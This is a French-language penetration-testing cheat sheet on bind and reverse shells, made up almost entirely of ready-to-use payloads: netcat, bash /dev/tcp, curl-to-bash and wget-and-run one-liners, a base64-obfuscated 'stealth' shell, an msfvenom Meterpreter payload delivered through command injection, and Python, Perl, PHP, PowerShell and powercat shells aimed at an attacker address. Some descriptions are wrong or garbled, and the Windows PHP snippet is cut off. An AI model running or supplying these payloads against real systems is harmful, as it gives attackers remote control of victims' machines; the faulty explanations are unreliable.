💛shell et reverse shell
Bind Shell : Un shell est un programme informatique qui fournit une interface utilisateur pour accéder aux services d'exploitation d'un système d'exploitation. Il permet à l'utilisateur de saisir des commandes qui sont ensuite interprétées et exécutées par le système d'exploitation. Il est utilisée lorsqu’un attaquant a déjà déposé une porte dérobée (backdoor) sur le serveur, ou bien qu’il profite d’une faille très critique.
Reverse Shell : Un reverse shell est une technique utilisée en sécurité informatique pour obtenir un accès à distance à un système cible. Contrairement à un shell classique où un client se connecte à un serveur pour exécuter des commandes sur ce dernier, dans un reverse shell, c'est les machines victimes qui se connectent à l'attaquant C'est souvent utilisé dans des scénarios de piratage où un pare-feu ou d'autres mécanismes de sécurité peuvent bloquer les connexions entrantes.
🖊️ Générer un reverse shell
📑 Shell de base
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc IP_attack 4444 >/tmp/f🪟 Windows / metasploit - vulnérabilité command injection
Génerer un payload :
msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP_attack LPORT=4443 -f exe > rev.exeMise en place d'un server :
python3 -m http.server 8000Dans le cadre d'une vulnérabilité qui permet l'exécution de commande à distance :
python3 exploit.py IP_cible "powershell.exe Invoke-WebRequest -Uri http://IP_attack:8000/rev.exe -OutFile ./rev.exe && .\rev.exe"🐚 Bash / sh
curl https://reverse-shell.sh/1.1.1.1:3000 | bashDescription : Télécharge un script Bash à partir de l'URL https://reverse-shell.sh/1.1.1.1:3000 et l'exécute avec Bash.
bash -i >& /dev/tcp/<ATTACKER-IP>/<PORT> 0>&1Description : Ouvre une connexion TCP inverse vers <ATTACKER-IP> sur le <PORT> spécifié et redirige les entrées et les sorties standards vers cette connexion.
bash -i >& /dev/udp/127.0.0.1/4242 0>&1 #UDPDescription : Ouvre une connexion UDP inverse vers
127.0.0.1sur le port4242et redirige les entrées et les sorties standards vers cette connexion.
0<&196;exec 196<>/dev/tcp/<ATTACKER-IP>/<PORT>; sh <&196 >&196 2>&196Description : Réalise une redirection des descripteurs de fichiers pour établir une connexion TCP inverse vers
<ATTACKER-IP>sur le<PORT>spécifié et exécute un shell interactif.
exec 5<>/dev/tcp/<ATTACKER-IP>/<PORT>; while read line 0<&5; do $line 2>&5 >&5; doneDescription : Ouvre une connexion TCP inverse vers
<ATTACKER-IP>sur le<PORT>spécifié et lit les commandes à exécuter depuis cette connexion.
🔄 Méthode courte et de contournement
(sh)0>/dev/tcp/10.10.10.10/9091Description : Ouvre une connexion TCP vers
10.10.10.10sur le port9091et exécute un shell interactif.
exec >&0Description : Une fois qu'un shell est établi avec succès, la commande
exec >&0est utilisée pour rediriger la sortie vers l'entrée standard. Cela signifie que toutes les sorties des commandes exécutées seront renvoyées comme entrée, ce qui permet d'exécuter des commandes directement depuis le shell sans avoir besoin d'écrire sur le terminal.
🔒 Shell symboliquement sécurisé
bash -c 'bash -i >& /dev/tcp/<ATTACKER-IP>/<PORT> 0>&1'Description : Lance un shell Bash avec une commande incorporée pour ouvrir une connexion TCP inverse vers
<ATTACKER-IP>sur le<PORT>spécifié et rediriger les entrées et les sorties standards vers cette connexion.
🕵️♂️ Méthode furtive
echo bm9odXAgYmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC44LjQuMTg1LzQ0NDQgMD4mMScK | base64 -d | bash 2>/dev/nullDescription : Décode une commande Bash à partir de sa représentation en base64, puis l'exécute en redirigeant les erreurs vers
/dev/nullpour la furtivité.
📄 Créer un fichier et l'exécute
echo -e '#!/bin/bash\nbash -i >& /dev/tcp/1<ATTACKER-IP>/<PORT> 0>&1' > /tmp/sh.sh; bash /tmp/sh.sh;Description : Crée un script Bash dans
/tmp/sh.shqui ouvre une connexion TCP inverse vers<ATTACKER-IP>sur le<PORT>spécifié, puis l'exécute avec Bash.
wget http://<IP attacker>/shell.sh -P /tmp; chmod +x /tmp/shell.sh; /tmp/shell.shDescription : Télécharge un script Bash depuis
http://<IP attacker>/shell.shvers/tmp, lui donne les permissions d'exécution, puis l'exécute.
🐘 Python
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((IP_ATTAQUANTE,PORT))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/bash","-i"])Description : Établit une connexion TCP avec
<IP_ATTAQUANTE>sur le<PORT>spécifié. Duplique ensuite les descripteurs de fichiers standard (stdin,stdoutetstderr) vers le socket. Enfin, exécute un shell Bash interactif
🐍 Perl
use Socket;
socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));
if(connect(S,sockaddr_in($PORT,inet_aton($IP_ATTAQUANTE)))){
open(STDIN,">&S");
open(STDOUT,">&S");
open(STDERR,">&S");
exec("/bin/bash -i");
};Description : Établit une connexion TCP avec
<IP_ATTAQUANTE>sur le<PORT>spécifié, puis exécute une instance decmd.exepour obtenir un shell Windows.
🦐 PHP
Reverse Shell PHP (avec exec) :
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/<IP_ATTAQUANTE>/<PORT> 0>&1'"); ?>Description : Exécute une commande Bash pour ouvrir une connexion TCP inverse vers
<IP_ATTAQUANTE>sur le<PORT>spécifié, puis redirige les entrées et les sorties standards vers cette connexion.
Reverse Shell PHP (avec fsockopen et proc_open) :
fsockopen et proc_open) :<?php
$sock = fsockopen("<IP_ATTAQUANTE>", <PORT>);
$proc = proc_open("/bin/bash -i", array(0=>$sock, 1=>$sock, 2=>$sock), $pipes);
?>Description : Établit une connexion TCP avec
<IP_ATTAQUANTE>sur le<PORT>spécifié à l'aide defsockopen, puis exécute un shell interactif Bash à l'aide deproc_open.
Reverse Shell PHP pour Windows 💻
<?php header('Content-type: text/plain'); $ip = "Attack_IP"; $port = "1234"; $payload =Description : Cette commande est destinée à être utilisée sur un serveur web accessible par l'attaquant. L'attaquant peut inclure ce code PHP dans une page web et, lorsqu'un utilisateur visite cette page, une connexion TCP inverse est établie depuis le serveur web (machine cible) vers l'attaquant.
🪝PowerShell (à exécuter dans cmd.exe)
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('attack_IP',Port);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"Description : Établit une connexion TCP inverse vers l'attaquant et exécute un shell interactif PowerShell sur la machine cible. Les commandes saisies par l'attaquant sont exécutées sur la machine cible et les résultats sont renvoyés à l'attaquant.
Bind Shell PowerShell
powershell -c "$listener = New-Object System.Net.Sockets.TcpListener('attack_IP',Port);$listener.start();$client = $listener.AcceptTcpClient();$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close();$listener.Stop()"Description : Ouvre un port sur la machine cible en mode écoute, attendant une connexion entrante. Lorsqu'une connexion est établie, il exécute un shell interactif PowerShell. Les commandes saisies par l'attaquant sont exécutées sur la machine cible et les résultats sont renvoyés à l'attaquant.
Reverse Shell avec Powercat 🐱
powercat -c attack_IP -p Port -e cmd.exeDescription : Établit une connexion TCP inverse vers l'attaquant et exécute cmd.exe (Command Prompt) sur la machine cible.
Bind Shell avec Powercat 🐱
epowercat -l -p 443 -e cmd.exeDescription : Ouvre un port sur la machine cible en mode écoute, attendant une connexion entrante. Lorsqu'une connexion est établie, il exécute cmd.exe (Command Prompt) sur la machine cible.
Last updated